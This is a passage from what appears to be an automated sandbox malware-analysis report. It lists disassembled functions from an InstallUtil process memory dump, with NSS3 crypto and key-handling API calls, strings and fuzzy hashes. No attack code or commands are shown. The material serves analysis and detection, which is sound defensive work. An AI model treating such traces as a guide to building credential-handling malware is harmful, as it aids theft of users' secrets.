                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$Find$ArenaTag_$AlgorithmAlloc_K11_Mark_$DestroyFreePublicValuecallocfree
                                                                                                                  • String ID: S{l
                                                                                                                  • API String ID: 759478663-2432972085
                                                                                                                  • Opcode ID: dcc8ef42f80c89b6ba97677c1c968eb9dd126f7b29df0ba0f4786d9fbbd653d8
                                                                                                                  • Instruction ID: 223aefb4ce80334f25f0942e369416c0f823f86ee018b8b27fa90f6a2d2153d2
                                                                                                                  • Opcode Fuzzy Hash: dcc8ef42f80c89b6ba97677c1c968eb9dd126f7b29df0ba0f4786d9fbbd653d8
                                                                                                                  • Instruction Fuzzy Hash: E0C16FB5E012099FEB00CF69DA85BAA77B4BF08318F1405B9E916B7B51E731E804CBD1
                                                                                                                  Function 6C7E28C0 Relevance: 27.2, APIs: 18, Instructions: 230COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 6C7E5B40: PR_GetIdentitiesLayer.NSS3 ref: 6C7E5B56
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E290A
                                                                                                                  • EnterCriticalSection.KERNEL32(00000001), ref: 6C7E291E
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C7E2937
                                                                                                                  • EnterCriticalSection.KERNEL32(00000001), ref: 6C7E294B
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2966
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E29AC
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E29D1
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E29F0
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2A15
                                                                                                                  • PR_EnterMonitor.NSS3(?), ref: 6C7E2A37
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2A61
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2A78
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2A8F
                                                                                                                  • PR_ExitMonitor.NSS3(?), ref: 6C7E2AA6
                                                                                                                    • Part of subcall function 6C819440: TlsGetValue.KERNEL32 ref: 6C81945B
                                                                                                                    • Part of subcall function 6C819440: TlsGetValue.KERNEL32 ref: 6C819479
                                                                                                                    • Part of subcall function 6C819440: EnterCriticalSection.KERNEL32 ref: 6C819495
                                                                                                                    • Part of subcall function 6C819440: TlsGetValue.KERNEL32 ref: 6C8194E4
                                                                                                                    • Part of subcall function 6C819440: TlsGetValue.KERNEL32 ref: 6C819532
                                                                                                                    • Part of subcall function 6C819440: LeaveCriticalSection.KERNEL32 ref: 6C81955D
                                                                                                                  • PK11_HPKE_DestroyContext.NSS3(?,00000001), ref: 6C7E2AF9
                                                                                                                  • free.MOZGLUE(?), ref: 6C7E2B16
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7E2B6D
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C7E2B80
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Monitor$Enter$Value$Exit$CriticalSection$Unlock$ContextDestroyIdentitiesK11_LayerLeavefree
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2841089016-0
                                                                                                                  • Opcode ID: b6cbafaec7ea58b5208554d66aa5708511254f7ff40795c14ce795059de1f6d0
                                                                                                                  • Instruction ID: 9a4fa4c6500af2dabe44dfd707ddff66fb06d8dc02c82eb1a63f07a01b89b81a
                                                                                                                  • Opcode Fuzzy Hash: b6cbafaec7ea58b5208554d66aa5708511254f7ff40795c14ce795059de1f6d0
                                                                                                                  • Instruction Fuzzy Hash: 6181B6B2A007025BDB209F39ED49797B7E5AF15318F044938D85AC7B11EB32E519CB91
                                                                                                                  Function 6C7A8E40 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 198stringmemoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • memchr.VCRUNTIME140(abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_,00000000,00000041,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8E7B
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8E9E
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(6C8B0B64,00000001,?,?,?,?,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8EAD
                                                                                                                  • memcpy.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,?,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8EC3
                                                                                                                  • strlen.API-MS-WIN-CRT-STRING-L1-1-0(5D8B5657,?,?,?,?,?,?,?,?,?,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8ED8
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,6C7A8E01,00000000,6C7A9060,6C8B0B64), ref: 6C7A8EE5
                                                                                                                  • memcpy.VCRUNTIME140(00000000,5D8B5657,00000001,?,?,?,?,?,?,?,?,?,?,?,?,6C7A8E01), ref: 6C7A8EFB
                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(6C8B0B64,6C8B0B64), ref: 6C7A8F11
                                                                                                                  • PORT_ArenaGrow_Util.NSS3(?,5D8B5657,643D8B08), ref: 6C7A8F3F
                                                                                                                    • Part of subcall function 6C7AA110: PORT_ArenaGrow_Util.NSS3(8514C483,EB2074C0,184D8B3E,?,00000000,00000000,00000000,FFFFFFFF,?,6C7AA421,00000000,00000000,6C7A9826), ref: 6C7AA136
                                                                                                                  • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7A904A
                                                                                                                  Strings
                                                                                                                  • abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_, xrefs: 6C7A8E76
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ArenaUtil$Alloc_Grow_memcpystrlen$Errormemchrstrcmp
                                                                                                                  • String ID: abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_
                                                                                                                  • API String ID: 977052965-1032500510
                                                                                                                  • Opcode ID: 70bce0702ada8a701bc11eeab141e983620c5bb81f689b4d391e2cb6422ae779
                                                                                                                  • Instruction ID: 2b50797d879ed74552bde2c9d270f8ea5acc6c2aa017e7f7dcc2670f759cbc0a
                                                                                                                  • Opcode Fuzzy Hash: 70bce0702ada8a701bc11eeab141e983620c5bb81f689b4d391e2cb6422ae779
                                                                                                                  • Instruction Fuzzy Hash: D46195B5D00106AFDB10CF96CE44AABB7B5FF95358F144638DC18A7700E732A916CBA0
                                                                                                                  Function 6C758E00 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 193memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C758E5B
                                                                                                                  • PR_SetError.NSS3(FFFFE007,00000000), ref: 6C758E81
                                                                                                                  • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C758EED
                                                                                                                  • SEC_QuickDERDecodeItem_Util.NSS3(?,?,6C8818D0,?), ref: 6C758F03
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C758F19
                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C758F2B
                                                                                                                  • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C758F53
                                                                                                                  • memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C758F65
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C758FA1
                                                                                                                  • SECITEM_DupItem_Util.NSS3(?), ref: 6C758FFE
                                                                                                                  • PR_CallOnce.NSS3(6C8B2AA4,6C7B12D0), ref: 6C759012
                                                                                                                  • PL_FreeArenaPool.NSS3(?), ref: 6C759024
                                                                                                                  • PL_FinishArenaPool.NSS3(?), ref: 6C75902C
                                                                                                                  • PORT_DestroyCheapArena.NSS3(?), ref: 6C75903E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Arena$Pool$Util$CallErrorFinishFreeItem_Once$Alloc_CheapDecodeDestroyInitQuickmemset
                                                                                                                  • String ID: security
                                                                                                                  • API String ID: 3512696800-3315324353
                                                                                                                  • Opcode ID: f1aedfa1e888bb2c243e6e43a05866626a05a45873f330185baeb1bc31d85d55
                                                                                                                  • Instruction ID: 227f8ad23c92b1c55227ade42fc3554a705ad44c372791c4b39741e2acba3f4b
                                                                                                                  • Opcode Fuzzy Hash: f1aedfa1e888bb2c243e6e43a05866626a05a45873f330185baeb1bc31d85d55
                                                                                                                  • Instruction Fuzzy Hash: 50516BB1648300ABD7205E54DE49FAB73E8AB8535CF84093EF55897B80EB32D919C763
                                                                                                                  Function 6C81CD70 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 76COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6C81CC7B), ref: 6C81CD7A
                                                                                                                    • Part of subcall function 6C81CE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6C78C1A8,?), ref: 6C81CE92
                                                                                                                  • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C81CDA5
                                                                                                                  • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C81CDB8
                                                                                                                  • PR_UnloadLibrary.NSS3(00000000), ref: 6C81CDDB
                                                                                                                  • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C81CD8E
                                                                                                                    • Part of subcall function 6C7405C0: PR_EnterMonitor.NSS3 ref: 6C7405D1
                                                                                                                    • Part of subcall function 6C7405C0: PR_ExitMonitor.NSS3 ref: 6C7405EA
                                                                                                                  • PR_LoadLibrary.NSS3(wship6.dll), ref: 6C81CDE8
                                                                                                                  • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6C81CDFF
                                                                                                                  • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6C81CE16
                                                                                                                  • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6C81CE29
                                                                                                                  • PR_UnloadLibrary.NSS3(00000000), ref: 6C81CE48
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                                                                                  • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                                                                                  • API String ID: 601260978-871931242
                                                                                                                  • Opcode ID: f84f10b28618afe598748465688457af2cf1d4421d222531e28f1ae408616da9
                                                                                                                  • Instruction ID: c96ace9196c3bea68fb2824c4c25b4d616578d404d8fe2e57b9a35f619bf863f
                                                                                                                  • Opcode Fuzzy Hash: f84f10b28618afe598748465688457af2cf1d4421d222531e28f1ae408616da9
                                                                                                                  • Instruction Fuzzy Hash: C31106A6E1712312EF306A356F089BA3AD89B5314DF584D34D815D6F42FB20C909C3F6
                                                                                                                  Function 6C794540 Relevance: 25.8, APIs: 17, Instructions: 349COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • PK11_MakeIDFromPubKey.NSS3(00000000), ref: 6C794590
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C79471C
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C79477C
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C79479A
                                                                                                                  • PR_SetError.NSS3(FFFFE002,00000000), ref: 6C79484A
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C794858
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C79486A
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C79487E
                                                                                                                    • Part of subcall function 6C7FDD70: TlsGetValue.KERNEL32 ref: 6C7FDD8C
                                                                                                                    • Part of subcall function 6C7FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C7FDDB4
                                                                                                                  • PK11_FreeSymKey.NSS3(?), ref: 6C79488C
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C79489C
                                                                                                                  • PK11_GetInternalSlot.NSS3 ref: 6C7948B2
                                                                                                                  • PK11_UnwrapPrivKey.NSS3(00000000,00000130,00000000,?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,6C777F9D), ref: 6C7948EC
                                                                                                                  • SECKEY_DestroyPrivateKey.NSS3(00000000), ref: 6C79492A
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C794949
                                                                                                                  • PR_SetError.NSS3(00000000,00000000), ref: 6C794977
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C794987
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C79499B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Item_UtilZfree$K11_$CriticalErrorFreeSectionValue$DestroyEnterFromInternalLeaveMakePrivPrivateSlotUnlockUnwrap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1673584487-0
                                                                                                                  • Opcode ID: efa98a1792904fccf5611abd3bdcef060c5c503ea46fd03efaa97fce22634715
                                                                                                                  • Instruction ID: 2f51bd915fe202d747c66aff217d68c9ac548abfacefc362eb40862a67870352
                                                                                                                  • Opcode Fuzzy Hash: efa98a1792904fccf5611abd3bdcef060c5c503ea46fd03efaa97fce22634715
                                                                                                                  • Instruction Fuzzy Hash: BDE17CB1D002599FDB20CF24DD48BEEBBB5EF04308F1481A9E819A7751E7329A95DF90
                                                                                                                  Function 6C7C0C60 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 153memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(*,|l), ref: 6C7C0C81
                                                                                                                    • Part of subcall function 6C7ABE30: SECOID_FindOID_Util.NSS3(6C76311B,00000000,?,6C76311B,?), ref: 6C7ABE44
                                                                                                                    • Part of subcall function 6C798500: SECOID_GetAlgorithmTag_Util.NSS3(6C7995DC,00000000,00000000,00000000,?,6C7995DC,00000000,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C798517
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7C0CC4
                                                                                                                    • Part of subcall function 6C7AFAB0: free.MOZGLUE(?,-00000001,?,?,6C74F673,00000000,00000000), ref: 6C7AFAC7
                                                                                                                  • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C7C0CD5
                                                                                                                  • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6C7C0D1D
                                                                                                                  • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6C7C0D3B
                                                                                                                  • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6C7C0D7D
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7C0DB5
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7C0DC1
                                                                                                                  • free.MOZGLUE(00000000), ref: 6C7C0DF7
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C7C0E05
                                                                                                                  • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7C0E0F
                                                                                                                    • Part of subcall function 6C7995C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C7995E0
                                                                                                                    • Part of subcall function 6C7995C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6C777F4A,00000000,?,00000000,00000000), ref: 6C7995F5
                                                                                                                    • Part of subcall function 6C7995C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6C799609
                                                                                                                    • Part of subcall function 6C7995C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C79961D
                                                                                                                    • Part of subcall function 6C7995C0: PK11_GetInternalSlot.NSS3 ref: 6C79970B
                                                                                                                    • Part of subcall function 6C7995C0: PK11_FreeSymKey.NSS3(00000000), ref: 6C799756
                                                                                                                    • Part of subcall function 6C7995C0: PK11_GetIVLength.NSS3(?), ref: 6C799767
                                                                                                                    • Part of subcall function 6C7995C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6C79977E
                                                                                                                    • Part of subcall function 6C7995C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C79978E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                  • String ID: *,|l$*,|l$-$|l
                                                                                                                  • API String ID: 3136566230-2839495522
                                                                                                                  • Opcode ID: 710ef4018f8bc36db7bb6cf6b44fa7d5186467251c73998afb2eba6cba30d3b6
                                                                                                                  • Instruction ID: f587d8f6039b71489ca20e8872039968cb4580b69a7986a0701d8e40076f46d2
                                                                                                                  • Opcode Fuzzy Hash: 710ef4018f8bc36db7bb6cf6b44fa7d5186467251c73998afb2eba6cba30d3b6
                                                                                                                  • Instruction Fuzzy Hash: 8A41C2F1A0124AAFEB109F65EE4ABEF7674AF0530CF104134E91567741E735AA18CBE2
                                                                                                                  Function 6C7B6CA0 Relevance: 24.3, APIs: 16, Instructions: 311memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C881DE0,?), ref: 6C7B6CFE
                                                                                                                  • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C7B6D26
                                                                                                                  • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6C7B6D70
                                                                                                                  • PORT_Alloc_Util.NSS3(00000480), ref: 6C7B6D82
                                                                                                                  • DER_GetInteger_Util.NSS3(?), ref: 6C7B6DA2
                                                                                                                  • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7B6DD8
                                                                                                                  • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6C7B6E60
                                                                                                                  • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6C7B6F19
                                                                                                                  • PK11_DigestBegin.NSS3(00000000), ref: 6C7B6F2D
                                                                                                                  • PK11_DigestOp.NSS3(?,?,00000000), ref: 6C7B6F7B
                                                                                                                  • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6C7B7011
                                                                                                                  • PK11_FreeSymKey.NSS3(00000000), ref: 6C7B7033
                                                                                                                  • free.MOZGLUE(?), ref: 6C7B703F
                                                                                                                  • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6C7B7060
                                                                                                                  • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6C7B7087
                                                                                                                  • PR_SetError.NSS3(FFFFE062,00000000), ref: 6C7B70AF
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2492988654.000000006C6D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2492967671.000000006C6D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494210753.000000006C86F000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494438749.000000006C8AE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494465813.000000006C8AF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494490054.000000006C8B0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2494515750.000000006C8B5000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_6c6d0000_InstallUtil.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2108637330-0
                                                                                                                  • Opcode ID: 1bd9dcee12da3f92ac56057b813ed13993714d30bf5105efe769ce3e0f843c13
                                                                                                                  • Instruction ID: 1c32caa14164e907b20174e3cfd9ed322c16abb6c952cfb61fb6ace4930263c8
                                                                                                                  • Opcode Fuzzy Hash: 1bd9dcee12da3f92ac56057b813ed13993714d30bf5105efe769ce3e0f843c13
                                                                                                                  • Instruction Fuzzy Hash: 6AA11B719042009FEB149F24DE49B5B32A4EB8130CF248939FB19EBB91E775DA45C7A3
                                                                                                                  Function 6C77AEC0 Relevance: 24.3, APIs: 16, Instructions: 272threadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • TlsGetValue.KERNEL32(?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77AF25
                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77AF39
                                                                                                                  • PR_Unlock.NSS3(?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77AF51
                                                                                                                  • PR_SetError.NSS3(FFFFE041,00000000,?,?,?,6C75AB95,00000000,?,00000000,00000000,00000000), ref: 6C77AF69
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C77B06B
                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C77B083
                                                                                                                  • PR_Unlock.NSS3(?), ref: 6C77B0A4
                                                                                                                  • TlsGetValue.KERNEL32 ref: 6C77B0C1
                                                                                                                  • EnterCriticalSection.KERNEL32(00000000), ref: 6C77B0D9
                                                                                                                  • PR_Unlock.NSS3 ref: 6C77B102
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C77B151
                                                                                                                  • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C77B182
                                                                                                                    • Part of subcall function 6C7AFAB0: free.MOZGLUE(?,-00000001,?,?,6C74F673,00000000,00000000), ref: 6C7AFAC7
                                                                                                                  • PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C77B177
                                                                                                                    • Part of subcall function 6C7FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C7FC2BF
